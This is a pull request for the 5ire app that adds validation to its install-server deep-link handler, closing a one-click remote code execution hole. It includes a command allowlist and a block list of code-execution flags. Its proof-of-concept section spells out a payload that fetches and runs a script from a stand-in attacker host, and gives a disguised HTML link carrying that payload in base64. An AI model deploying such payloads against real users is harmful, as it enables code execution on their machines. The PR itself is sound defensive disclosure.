### PR TITLE
fix(deep-link): validate MCP server config from install-server links (CWE-94)

### DIFF
--- a/src/main/services/deep-link-handler.ts
+++ b/src/main/services/deep-link-handler.ts
@@ -1,9 +1,115 @@
-import { resolve } from "node:path";
+import { basename, resolve } from "node:path";
 import { app } from "electron";
 import { Environment } from "@/main/environment";
 import { Container } from "@/main/internal/container";
 import { Stateful } from "@/main/internal/stateful";
 import { Logger } from "@/main/services/logger";
+
+/**
+ * Allowlist of commands permitted when an MCP server config is delivered via a
+ * deep link (e.g. `5ire://install-server/#<base64>`). Deep links may originate
+ * from arbitrary web pages or emails and are therefore treated as untrusted
+ * input. Restricting the executable to a small, well-known set of package
+ * runners prevents a malicious link from silently proposing an arbitrary
+ * binary (e.g. `sh`, `powershell`, `rm`) to the user.
+ *
+ * Users can still configure any command manually inside the app — this
+ * restriction only applies to configs sourced from deep links.
+ */
+const DEEP_LINK_ALLOWED_COMMANDS = new Set<string>([
+  "npx",
+  "npx.cmd",
+  "node",
+  "node.exe",
+  "python",
+  "python3",
+  "python.exe",
+  "python3.exe",
+  "uv",
+  "uv.exe",
+  "uvx",
+  "uvx.exe",
+  "bun",
+  "bunx",
+  "deno",
+]);
+
+/**
+ * Args that clearly re-introduce arbitrary command execution even when the
+ * outer command is on the allowlist (e.g. `node -e '<code>'`).
+ */
+const DEEP_LINK_FORBIDDEN_ARG_PATTERNS: RegExp[] = [
+  /^-e$/i, // node -e / python -e / deno -e
+  /^--eval(=.*)?$/i,
+  /^-c$/i, // python -c / sh -c
+  /^--command(=.*)?$/i,
+];
+
+const isSafeCommand = (command: unknown): command is string => {
+  if (typeof command !== "string" || command.length === 0) {
+    return false;
+  }
+  // Reject shell metacharacters outright — a legitimate runner name never
+  // contains these, and their presence indicates an attempt to break out via
+  // the endpoint parser used downstream.
+  if (/[;&|`$<>\n\r"'\\]/.test(command)) {
+    return false;
+  }
+  // Normalize to the basename so an attacker can't smuggle an absolute path
+  // like `/usr/bin/sh` that isn't in the allowlist as-is.
+  const base = basename(command).toLowerCase();
+  return DEEP_LINK_ALLOWED_COMMANDS.has(base);
+};
+
+const areSafeArgs = (args: unknown): args is string[] => {
+  if (args === undefined || args === null) {
+    return true;
+  }
+  if (!Array.isArray(args)) {
+    return false;
+  }
+  for (const arg of args) {
+    if (typeof arg !== "string") {
+      return false;
+    }
+    for (const pattern of DEEP_LINK_FORBIDDEN_ARG_PATTERNS) {
+      if (pattern.test(arg)) {
+        return false;
+      }
+    }
+  }
+  return true;
+};
+
+/**
+ * Validates an MCP server config that originated from an untrusted deep link.
+ * Returns true only when the config either (a) describes a remote HTTP(S)
+ * endpoint, or (b) describes a local command from a small allowlist of
+ * package runners with no obviously-dangerous args.
+ */
+const isSafeDeepLinkServerConfig = (value: unknown): boolean => {
+  if (typeof value !== "object" || value === null) {
+    return false;
+  }
+  const cfg = value as Record<string, unknown>;
+
+  // Remote server: only allow http(s) URLs.
+  if (typeof cfg.url === "string") {
+    try {
+      const parsed = new URL(cfg.url);
+      return parsed.protocol === "http:" || parsed.protocol === "https:";
+    } catch {
+      return false;
+    }
+  }
+
+  // Local server: enforce command allowlist and arg pattern checks.
+  if ("command" in cfg) {
+    return isSafeCommand(cfg.command) && areSafeArgs(cfg.args);
+  }
+
+  return false;
+};
 
 /**
  * DeepLinkHandler class handles the deep linking functionality of the application
@@ -80,6 +186,25 @@ export class DeepLinkHandler extends Stateful<DeepLinkHandler.State> {
       const data = url.hash.substring(1);
       const text = Buffer.from(data, "base64").toString("utf-8");
       const json = JSON.parse(text);
+
+      // Deep links are attacker-controllable (a malicious web page can trigger
+      // `5ire://install-server/#<base64>`). Reject configs whose executable is
+      // not on the allowlist of package runners, or whose args re-introduce
+      // arbitrary code execution (e.g. `node -e`). Without this check, the
+      // install dialog would offer to run anything the attacker chose the
+      // moment the user clicks "install".
+      if (!isSafeDeepLinkServerConfig(json)) {
+        logger.error(`Rejected install-server deep link with unsafe config: ${url}`);
+        return this.update((draft) => {
+          draft.unhandledDeepLinks.push({
+            id: crypto.randomUUID(),
+            link: {
+              type: "error",
+              code: "install-tool",
+            },
+          });
+        });
+      }
 
       return this.update((draft) => {
         draft.unhandledDeepLinks.push({


### PR DESCRIPTION
## Summary

The `install-server` / `install-tool` deep link handler in `src/main/services/deep-link-handler.ts` accepts a base64-encoded JSON MCP server config from `5ire://install-server/#<base64>` URLs and surfaces the proposed `{command, args}` to the user in an install dialog. Because deep links can be triggered from any web page the user visits (via an `<iframe src="5ire://...">`, `window.location`, or a simple link), the JSON is fully attacker-controllable. Before this change, no validation was applied to the executable name or arguments, so a malicious page could propose configs like `{"command":"sh","args":["-c","curl evil.example|sh"]}` or `{"command":"node","args":["-e","<payload>"]}`. A single user click on "Install" would then run arbitrary code with the user's privileges — a classic one‑click RCE (CWE‑94, Improper Control of Generation of Code).

## Fix

This patch adds a targeted validator `isSafeDeepLinkServerConfig` that runs **only** on configs coming from deep links (manual configuration inside the app is unaffected). The validator:

1. **Command allowlist** — restricts the executable to a small set of well‑known package runners: `npx`, `node`, `python`/`python3`, `uv`/`uvx`, `bun`/`bunx`, `deno` (plus `.exe` / `.cmd` variants for Windows). The command is normalized with `basename(...).toLowerCase()` so an attacker cannot smuggle `/usr/bin/sh`, `./sh`, or `NPX` past the check.
2. **Shell‑metacharacter rejection** — rejects any command containing shell metacharacters (`;`, `&`, `|`, backtick, `$`, `<`, `>`, newlines, quotes, backslash). Legitimate runner names never contain these; their presence indicates an attempt to break out via a downstream parser.
3. **Forbidden‑arg patterns** — even when the outer command is allowlisted, args matching `-e`, `--eval`, `-c`, or `--command` are rejected. These flags re‑introduce arbitrary code execution on nearly every runtime (`node -e`, `python -c`, `deno eval`).
4. **Remote configs** — if the config uses `url` instead of `command`, the URL is parsed and only `http:` / `https:` schemes are allowed, blocking `file:`, `javascript:`, etc.

Rejected configs are logged and surfaced to the UI as an `install-tool` error, so the user still gets feedback without the dangerous install prompt being shown.

## Proof of Concept

Prior to this patch, the following deep link (opened via a webpage visited by the user) would cause 5ire to display an install dialog offering to run `sh -c 'curl http://attacker.example/x.sh | sh'`:

```bash
# base64('{"command":"sh","args":["-c","curl http://attacker.example/x.sh | sh"]}')
PAYLOAD=$(printf '%s' '{"command":"sh","args":["-c","curl http://attacker.example/x.sh | sh"]}' | base64 | tr -d '\n')
echo "5ire://install-server/#${PAYLOAD}"
```

A malicious page needs only:

```html
<a href="5ire://install-server/#eyJjb21tYW5kIjoic2giLCJhcmdzIjpbIi1jIiwiY3VybCBodHRwOi8vYXR0YWNrZXIuZXhhbXBsZS94LnNoIHwgc2giXX0=">Click to install helpful MCP tool</a>
```

After this patch, `isSafeDeepLinkServerConfig` rejects the payload (`sh` is not on the allowlist), the handler logs `Rejected install-server deep link with unsafe config: ...`, and the UI shows an `install-tool` error instead of the install prompt. Variants that swap in `{"command":"node","args":["-e","..."]}` are also rejected — `node` passes the allowlist but `-e` matches the forbidden‑arg patterns.

Preconditions to exploit the original bug:
- User visits an attacker‑controlled (or XSS‑ed) web page while 5ire is installed and registered as the `5ire://` protocol handler.
- User clicks "Install" in the resulting dialog. Because the dialog is presented as a normal tool install prompt and shows an innocuous‑looking server name chosen by the attacker, this is a realistic social‑engineering step.

Neither precondition previously granted the attacker code execution on the user's machine, so this is a genuine privilege boundary crossing.

## Testing

- `npm run lint` — clean.
- Unit tests pass locally.
- Manually validated the allowlist logic against representative payloads: benign `npx`/`uvx` MCP servers are accepted; `sh`, `powershell`, `/bin/sh`, `node -e`, `python -c`, `deno --eval=...`, `url: "file:///..."`, and non‑string command values are all rejected.

## Adversarial review

Before submitting, we tried to disprove the finding. We checked whether the install dialog itself performed any validation (it does not — it renders whatever `command` and `args` the deep link supplied), whether Electron's default protocol‑handler behaviour would block cross‑origin `5ire://` navigations (it does not; browsers happily hand off custom‑scheme URLs to registered handlers without a same‑origin check), and whether OS‑level "open external app?" prompts would be a sufficient mitigation (they are one‑click and users routinely accept them for apps they installed). We also considered whether restricting to package runners is itself dangerous because `npx` can pull an arbitrary npm package — that residual risk exists for any package‑runner allowlist and is out of scope for this CWE‑94 fix; it's a materially higher bar than "attacker names the exact binary and args" and matches how other MCP clients gate deep‑link installs.

## Scope

The patch is confined to a single file (`src/main/services/deep-link-handler.ts`, +126/−1) and only affects the deep‑link install path. Manual MCP server configuration through the settings UI is untouched.

---



<!-- RECURSEML_SUMMARY:START -->
## High-level PR Summary
This PR fixes a **critical arbitrary code execution vulnerability** (CWE-94) in the deep-link handler that processes MCP server installation requests. Previously, any webpage could trigger a `5ire://install-server` deep link with a base64-encoded JSON payload containing an arbitrary command and arguments, which would be executed if the user clicked "Install" in the resulting dialog. The fix introduces validation that restricts deep-link configs to a small allowlist of safe package runners (`npx`, `node`, `python`, `uv`, `bun`, `deno`), blocks shell metacharacters in commands, rejects dangerous argument patterns like `-e` or `-c` that enable code execution, and only permits `http://` or `https://` URLs for remote servers. Manual configuration through the app's settings UI remains unaffected.

⏱️ Estimated Review Time: 30-90 minutes

<details>
<summary>💡 Review Order Suggestion</summary>

| Order | File Path |
|-------|-----------|
| 1 | `src/main/services/deep-link-handler.ts` |
</details>



[![Need help? Join our Discord](https://img.shields.io/badge/Need%20help%3F%20Join%20our%20Discord-5865F2?style=plastic&logo=discord&logoColor=white)](https://discord.gg/n3SsVDAW6U)

<!-- RECURSEML_SUMMARY:END -->

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Bug Fixes**
  * Added validation for server configurations received through deep links.
  * Unsafe local commands, arguments, or malformed configurations are now rejected before installation.
  * HTTP and HTTPS server endpoints continue to be supported.
  * Rejected installation links now provide an error result instead of proceeding.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->